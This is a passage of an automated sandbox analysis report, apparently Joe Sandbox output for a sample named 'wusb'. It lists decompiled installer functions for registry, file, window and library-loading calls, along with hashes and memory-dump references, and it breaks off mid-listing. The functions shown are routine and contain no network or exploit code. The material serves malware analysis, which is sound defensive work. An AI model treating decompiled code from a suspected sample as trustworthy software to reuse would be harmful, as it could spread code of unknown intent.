                                                        • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                        • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E0040247E(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402C77(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C37(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x4c) = 0x800;
					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00406193(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t37 - 4);
				return 0;
			}








                                                        0x0040247e
                                                        0x0040247e
                                                        0x00402483
                                                        0x0040248a
                                                        0x0040248c
                                                        0x00402493
                                                        0x00402496
                                                        0x00402885
                                                        0x0040249c
                                                        0x0040249f
                                                        0x004024ba
                                                        0x004024ea
                                                        0x004024ea
                                                        0x004024ed
                                                        0x004024bc
                                                        0x004024c0
                                                        0x004024d9
                                                        0x004024e0
                                                        0x004024e3
                                                        0x004024c2
                                                        0x004024c5
                                                        0x004024d0
                                                        0x00402549
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004024c5
                                                        0x004024c0
                                                        0x00402550
                                                        0x00402551
                                                        0x00402551
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                        • RegCloseKey.ADVAPI32(?,?,?,Finishs,00000000,00000011,00000002), ref: 00402551
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID:
                                                        • API String ID: 3356406503-0
                                                        • Opcode ID: 21d2e53ba5899b2399da8d375d2a26f7ebc178e4581a72889eecadc7fe3daa70
                                                        • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
                                                        • Opcode Fuzzy Hash: 21d2e53ba5899b2399da8d375d2a26f7ebc178e4581a72889eecadc7fe3daa70
                                                        • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 69%
                                                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a250;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x4291ec =  *0x4291ec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x4291ec, 0x7530,  *0x4291d4), 0); // executed
					}
				}
				return 0;
			}











                                                        0x0040138a
                                                        0x004013fa
                                                        0x0040139b
                                                        0x004013a0
                                                        0x00000000
                                                        0x00000000
                                                        0x004013a2
                                                        0x004013a3
                                                        0x004013ad
                                                        0x00000000
                                                        0x00401404
                                                        0x004013b0
                                                        0x004013b7
                                                        0x004013bd
                                                        0x004013be
                                                        0x004013c0
                                                        0x004013c2
                                                        0x004013b9
                                                        0x004013b9
                                                        0x004013ba
                                                        0x004013ba
                                                        0x004013c9
                                                        0x004013cb
                                                        0x004013f4
                                                        0x004013f4
                                                        0x004013c9
                                                        0x00000000

                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                        • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                        • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                        • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00402388(void* __ebx) {
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x24));
				if( *(_t23 - 0x18) != __ebx) {
					_t18 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1);
					goto L4;
				} else {
					_t10 = E00402C77(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                        0x00402388
                                                        0x00402388
                                                        0x0040238b
                                                        0x0040238e
                                                        0x004023cf
                                                        0x00000000
                                                        0x00402390
                                                        0x00402392
                                                        0x00402397
                                                        0x0040239b
                                                        0x00402885
                                                        0x00402885
                                                        0x004023a1
                                                        0x004023b1
                                                        0x004023b3
                                                        0x004023d1
                                                        0x004023d3
                                                        0x00000000
                                                        0x004023d9
                                                        0x004023d3
                                                        0x0040239b
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CloseDeleteValue
                                                        • String ID:
                                                        • API String ID: 2831762973-0
                                                        • Opcode ID: 859a452b567a2b49685365d2305dd34cf94649ed3485424598dfda958428dee9
                                                        • Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
                                                        • Opcode Fuzzy Hash: 859a452b567a2b49685365d2305dd34cf94649ed3485424598dfda958428dee9
                                                        • Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Window$EnableShow
                                                        • String ID:
                                                        • API String ID: 1136574915-0
                                                        • Opcode ID: d0d8b59ecb73009d1eee21f5c2343fbec77fc229469ffa234c84efe8ad4dd57b
                                                        • Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
                                                        • Opcode Fuzzy Hash: d0d8b59ecb73009d1eee21f5c2343fbec77fc229469ffa234c84efe8ad4dd57b
                                                        • Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406626 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00406626(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E004065B6(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                        0x0040662e
                                                        0x00406631
                                                        0x00406638
                                                        0x00406640
                                                        0x0040664c
                                                        0x00000000
                                                        0x00406653
                                                        0x00406643
                                                        0x0040664a
                                                        0x00000000
                                                        0x0040665b
                                                        0x00000000

                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                          • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                                          • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
                                                          • Part of subcall function 004065B6: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                        • Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
                                                        • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                        • Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405D3E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E00405D3E(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                        0x00405d42
                                                        0x00405d4f
                                                        0x00405d64
                                                        0x00405d6a

                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                        • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                        • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                        • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405D19 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405D19(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                        0x00405d1e
                                                        0x00405d24
                                                        0x00405d29
                                                        0x00405d32
                                                        0x00405d32
                                                        0x00405d3b

                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D32
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                        • Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
                                                        • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                        • Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004057FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004057FC(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                        0x00405802
                                                        0x0040580a
                                                        0x00000000
                                                        0x00405810
                                                        0x00000000

                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,766DFAA0,00403589,?,00000006,00000008,0000000A), ref: 00405802
                                                        • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                        • Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
                                                        • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                        • Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 33%
                                                        			E004027E9(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C15(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
					_t10 = SetFilePointer(E004061AC(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406193();
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                        0x004027e9
                                                        0x004027e9
                                                        0x004027ea
                                                        0x004027f2
                                                        0x004027f7
                                                        0x004027f8
                                                        0x00402807
                                                        0x00402810
                                                        0x00402a61
                                                        0x00402a62
